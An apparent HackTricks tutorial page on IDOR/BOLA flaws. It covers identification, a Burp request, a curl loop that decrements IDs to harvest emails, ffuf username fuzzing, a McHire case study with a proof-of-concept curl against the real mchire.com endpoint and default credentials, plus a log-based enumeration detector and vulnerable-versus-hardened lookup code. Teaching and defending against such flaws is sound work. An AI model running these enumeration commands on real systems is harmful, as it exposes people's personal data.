IDOR (Insecure Direct Object Reference)
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
IDOR (Insecure Direct Object Reference) / Broken Object Level Authorization (BOLA) occurs when a web or API endpoint exposes or accepts a user-controlled identifier that is used directly to reach an internal object, without verifying that the requesting user is authorized to access or modify that object. Successful exploitation usually allows horizontal or vertical privilege escalation, such as reading or modifying other users' data and, in the worst case, full account takeover or mass data exfiltration.
1. Identifying potential IDORs

- Look for parameters that reference an object:
  - Path: `/api/user/1234`, `/files/550e8400-e29b-41d4-a716-446655440000`
  - Query: `?id=42`, `?invoice=2024-00001`
  - Body / JSON: `{"user_id": 321, "order_id": 987}`
  - Headers / Cookies: `X-Client-ID: 4711`
- Prefer endpoints that read or update data (`GET`, `PUT`, `PATCH`, `DELETE`).
- Note when identifiers are sequential or predictable: if your ID is `64185742`, then `64185741` probably exists.
- Explore hidden or alternative paths (e.g. the "Paradox team members" link on login pages) that may expose additional APIs.
- Use an authenticated low-privilege session and change only the ID while keeping the same token/cookie. The absence of an authorization error is usually a sign of IDOR.
Quick manual tampering (Burp Repeater)

```http
PUT /api/lead/cem-xhr HTTP/1.1
Host: www.example.com
Cookie: auth=eyJhbGciOiJIUzI1NiJ9...
Content-Type: application/json

{"lead_id":64185741}
```
Automated enumeration (Burp Intruder / curl loop)

```bash
# seq needs an explicit -1 step to count downwards from your own id
for id in $(seq 64185742 -1 64185700); do
  curl -s -X PUT 'https://www.example.com/api/lead/cem-xhr' \
       -H 'Content-Type: application/json' \
       -H "Cookie: auth=$TOKEN" \
       -d '{"lead_id":'"$id"'}' | jq -e '.email' && echo "Hit $id";
done
```
Error-response oracle for user/file enumeration

When a download endpoint accepts both a username and a filename (e.g. `/view.php?username=<u>&file=<f>`), small differences in the error messages often create an oracle:

- Non-existent username → "User not found"
- Wrong filename but valid extension → "File does not exist" (sometimes it also lists the available files)
- Wrong extension → validation error

With any authenticated session you can fuzz the username parameter while using a benign filename and filter on the string "user not found" to discover valid users:

```bash
ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \
     -b 'PHPSESSID=<session-cookie>' \
     -w /opt/SecLists/Usernames/Names/names.txt \
     -fr 'User not found'
```

Once valid usernames are identified, request specific files directly (e.g. `/view.php?username=amanda&file=privacy.odt`). This pattern usually leads to unauthorized disclosure of other users' documents and credential leakage.
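From the defender's side, both enumeration patterns above (a decrementing `lead_id` loop and username fuzzing against the error oracle) leave the same trail: one client touching many distinct object ids on one endpoint within a short window. The detector below is an added example, not code from the original page or from any product; its audit-log format (epoch, client, endpoint, resolved object id, HTTP status), the sample lines, the addresses and the thresholds are all constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed audit-log sample (not real traffic). Assumed format: epoch, client,
# endpoint, the object id the handler resolved, HTTP status.
SAMPLE_LOG = """\
1700000001 10.0.0.5 /api/lead/cem-xhr id=64185742 200
1700000002 10.0.0.5 /api/lead/cem-xhr id=64185741 200
1700000003 10.0.0.5 /api/lead/cem-xhr id=64185740 200
1700000004 10.0.0.5 /api/lead/cem-xhr id=64185739 200
1700000005 10.0.0.5 /api/lead/cem-xhr id=64185738 200
1700000006 10.0.0.9 /api/lead/cem-xhr id=30000001 200
1700000090 10.0.0.9 /api/lead/cem-xhr id=30000002 200
1700000010 10.0.0.7 /view.php id=alice 404
1700000011 10.0.0.7 /view.php id=bob 404
1700000012 10.0.0.7 /view.php id=carol 404
1700000013 10.0.0.7 /view.php id=dave 200
"""
LINE_RE = re.compile(r"^(\d+) (\S+) (\S+) id=(\S+) (\d{3})$")


def parse(log):
    """Return (ts, client, endpoint, obj_id, status) tuples; malformed lines are skipped."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, client, endpoint, obj_id, status = m.groups()
            events.append((int(ts), client, endpoint, obj_id, int(status)))
    return events


def enumeration_alerts(events, window=60, min_ids=4):
    """Flag (client, endpoint) pairs touching >= min_ids distinct objects within
    `window` seconds; numeric ids forming an unbroken run are tagged sequential."""
    by_key = defaultdict(list)
    for ts, client, endpoint, obj_id, _status in events:
        by_key[(client, endpoint)].append((ts, obj_id))
    alerts = []
    for (client, endpoint), hits in by_key.items():
        hits.sort()
        for start_ts, _ in hits:  # slide a window over the sorted hits
            ids = {oid for ts, oid in hits if start_ts <= ts <= start_ts + window}
            if len(ids) >= min_ids:
                nums = sorted(int(x) for x in ids) if all(x.isdigit() for x in ids) else []
                sequential = bool(nums) and nums[-1] - nums[0] + 1 == len(nums)
                alerts.append((client, endpoint, len(ids), sequential))
                break
    return sorted(alerts)
```

The second client (10.0.0.9) reads two ids 84 seconds apart and is not flagged, which is the normal-use case the thresholds must leave alone.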
2. Real-world case study - McHire Chatbot Platform (2025)

During an assessment of the Paradox.ai-powered McHire recruitment portal, the following IDOR was discovered:

- Endpoint: `PUT /api/lead/cem-xhr`
- Authorization: user session cookie for any restaurant test account
- Body parameter: `{"lead_id": N}` → 8-digit, sequential numeric identifier

By decrementing `lead_id`, the tester obtained the full PII of applicants (name, e-mail, phone number, address, shift preferences) together with a consumer JWT that allowed session hijacking. Sequential enumeration of the range 1 → 64,185,742 exposed approximately 64 million records.

Proof-of-Concept request:

```bash
curl -X PUT 'https://www.mchire.com/api/lead/cem-xhr' \
     -H 'Content-Type: application/json' \
     -d '{"lead_id":64185741}'
```

Combined with default admin credentials (`123456:123456`) that granted access to the test account, the vulnerability resulted in a critical, company-wide data breach.
3. Impact of IDOR / BOLA

- Horizontal escalation → read/modify/delete other users' data.
- Vertical escalation → a low-privilege user gains admin-only functionality.
- Mass data breach when identifiers are sequential (e.g. applicant IDs, invoices).
- Account takeover by stealing tokens or resetting other users' passwords.
4. Mitigation and best practices

- Enforce object-level authorization on every request (`user_id == session.user`).
- Use indirect, unguessable identifiers (UUIDv4, ULID) instead of auto-increment IDs.
- Perform authorization server-side; never rely on hidden form fields or UI controls.
- Implement RBAC / ABAC checks in centralized middleware.
- Add rate-limiting & logging to detect ID enumeration.
- Security-test every new endpoint (unit, integration, and DAST).
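The first two points side by side, as an added example that is not code from the original page or from any of the products it names: a lookup that trusts the caller's `lead_id` (the BOLA pattern from the case study), the same lookup with the ownership check, and a per-user map of random UUIDv4 handles that replaces the sequential id in URLs and bodies. The in-memory store, account names and e-mail addresses are constructed.

```python
import uuid

# Constructed in-memory store (not a real system): applicant leads owned by two accounts.
LEADS = {
    64185741: {"owner": "restaurant-A", "email": "applicant1@example.com"},
    64185742: {"owner": "restaurant-B", "email": "applicant2@example.com"},
}

class Forbidden(Exception):
    """The session's principal may not access the requested object."""

def get_lead_vulnerable(session_user, lead_id):
    """BOLA pattern: the caller-supplied id is used directly and the session is
    never consulted, so any authenticated user can read any lead."""
    return LEADS[lead_id]

def get_lead(session_user, lead_id):
    """Hardened: ownership is checked on every call (user_id == session.user).
    Missing and foreign objects fail identically, so the endpoint is no oracle."""
    lead = LEADS.get(lead_id)
    if lead is None or lead["owner"] != session_user:
        raise Forbidden("lead not accessible")
    return lead

class IndirectRefs:
    """Per-user map from random UUIDv4 handles to internal ids: handles replace
    auto-increment ids in URLs/bodies and resolve only for the issuing user."""

    def __init__(self):
        self._refs = {}  # (user, handle) -> internal id

    def issue(self, user, internal_id):
        handle = str(uuid.uuid4())
        self._refs[(user, handle)] = internal_id
        return handle

    def resolve(self, user, handle):
        if (user, handle) not in self._refs:
            raise Forbidden("unknown reference")
        return self._refs[(user, handle)]

def fetch_by_handle(refs, session_user, handle):
    """Request path with both defences: resolve the opaque handle for this user,
    then still enforce ownership. Returns the lead, or None when denied."""
    try:
        return get_lead(session_user, refs.resolve(session_user, handle))
    except Forbidden:
        return None
```

The handle map alone is not sufficient: `fetch_by_handle` still calls `get_lead`, so a handle issued for an object the user does not own is denied at the ownership check.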
5. Tools

- BurpSuite extensions: Authorize, Auto Repeater, Turbo Intruder.
- OWASP ZAP: Auth Matrix, Forced Browse.
- Github projects: `bwapp-idor-scanner`, `Blindy` (bulk IDOR hunting).
References

- McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants' PII
- OWASP Top 10 - Broken Access Control
- How to Find More IDORs - Vickie Li
- HTB Nocturnal: IDOR oracle → file theft